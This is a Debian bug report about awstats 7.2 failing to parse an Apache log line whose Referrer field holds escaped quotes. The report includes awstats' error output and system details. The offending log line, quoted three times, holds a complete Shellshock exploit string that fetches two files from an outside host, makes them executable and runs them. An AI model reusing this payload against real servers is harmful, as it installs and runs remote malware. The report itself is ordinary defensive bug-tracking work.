Package: awstats Version: 7.2+dfsg-1 Severity: normal AWstats in jessie gets distracted by the following line in an Apache log:
staging.teckids.org:80 91.121.101.163 - - [04/Mar/2017:23:30:05 +0100] "GET /cgi-bin/status/status.cgi HTTP/1.0" 404 488 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-" The issue, obviously, is the Referrer, which someone tried to leverage to exploit the webserver, or PHP. Unfortunately, the line breaks awstats, and is effectively a DoS against AWstats. While breaking AWstats will, in practice, probably cause no real harm, it's still broken by valid input (the above posted line *is* valid input…), so I am reporting this as critical. I think the cause of the issue is AWstats not expecting escaped quotes in the string and mistaking them for ending quotes of the Referrer. Here's awstats' output hitting this line: Error while processing /etc/awstats/awstats.www.teckids.org.conf Create/Update database for config "/etc/awstats/awstats.www.teckids.org.conf" by AWStats version 7.2 (build 1.992) >From data in log file "/var/log/apache2/other_vhosts_access.log"... Phase 1 : First bypass old records, searching new record... Direct access after last parsed record (after line 7548) AWStats did not find any valid log lines that match your LogFormat parameter, in the 50th first non commented lines read of your log. Your log file /var/log/apache2/other_vhosts_access.log must have a bad format or LogFormat parameter setup does not match this format. Your AWStats LogFormat parameter is: %virtualname %host %other %logname %time1 %methodurl %code %bytesd %refererquot %uaquot This means each line in your web server log file need to have the following personalized log format: %virtualname %host %other %logname %time1 %methodurl %code %bytesd %refererquot %uaquot And this is an example of records AWStats found in your log file (the record number 50 in your log): staging.teckids.org:80 91.121.101.163 - - [04/Mar/2017:23:30:05 +0100] "GET /cgi-bin/admin.html HTTP/1.0" 404 481 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-" Setup ('/etc/awstats/awstats.www.teckids.org.conf' file, web server or permissions) may be wrong. Check config file, permissions and AWStats documentation (in 'docs' directory). Error while processing /etc/awstats/awstats.conf Create/Update database for config "/etc/awstats/awstats.conf" by AWStats version 7.2 (build 1.992) >From data in log file "/var/log/apache2/other_vhosts_access.log"... Phase 1 : First bypass old records, searching new record... Direct access after last parsed record (after line 7554) AWStats did not find any valid log lines that match your LogFormat parameter, in the 50th first non commented lines read of your log. Your log file /var/log/apache2/other_vhosts_access.log must have a bad format or LogFormat parameter setup does not match this format. Your AWStats LogFormat parameter is: %virtualname %host %other %logname %time1 %methodurl %code %bytesd %refererquot %uaquot This means each line in your web server log file need to have the following personalized log format: %virtualname %host %other %logname %time1 %methodurl %code %bytesd %refererquot %uaquot And this is an example of records AWStats found in your log file (the record number 50 in your log): staging.teckids.org:80 91.121.101.163 - - [04/Mar/2017:23:30:05 +0100] "GET /cgi-bin/status/status.cgi HTTP/1.0" 404 488 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-" Setup ('/etc/awstats/awstats.conf' file, web server or permissions) may be wrong. Check config file, permissions and AWStats documentation (in 'docs' directory). -- System Information: Debian Release: 8.7 APT prefers stable-updates APT policy: (500, 'stable-updates'), (500, 'stable') Architecture: amd64 (x86_64) Kernel: Linux 3.16.0-4-amd64 (SMP w/4 CPU cores) Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash Init: systemd (via /run/systemd/system) Versions of packages awstats depends on: ii perl 5.20.2-3+deb8u6 Versions of packages awstats recommends: ii coreutils 8.23-4 ii libnet-xwhois-perl 0.90-4 Versions of packages awstats suggests: ii apache2 [httpd] 2.4.10-10+deb8u8 ii apache2-mpm-prefork [httpd] 2.4.10-10+deb8u8 ii apache2-mpm-worker [httpd] 2.4.10-10+deb8u8 pn libgeo-ipfree-perl <none> ii libnet-dns-perl 0.81-2+deb8u1 ii libnet-ip-perl 1.26-1 ii liburi-perl 1.64-1 -- Configuration Files: /etc/awstats/awstats.conf changed [not included] /etc/awstats/awstats.conf.local changed [not included] -- no debconf information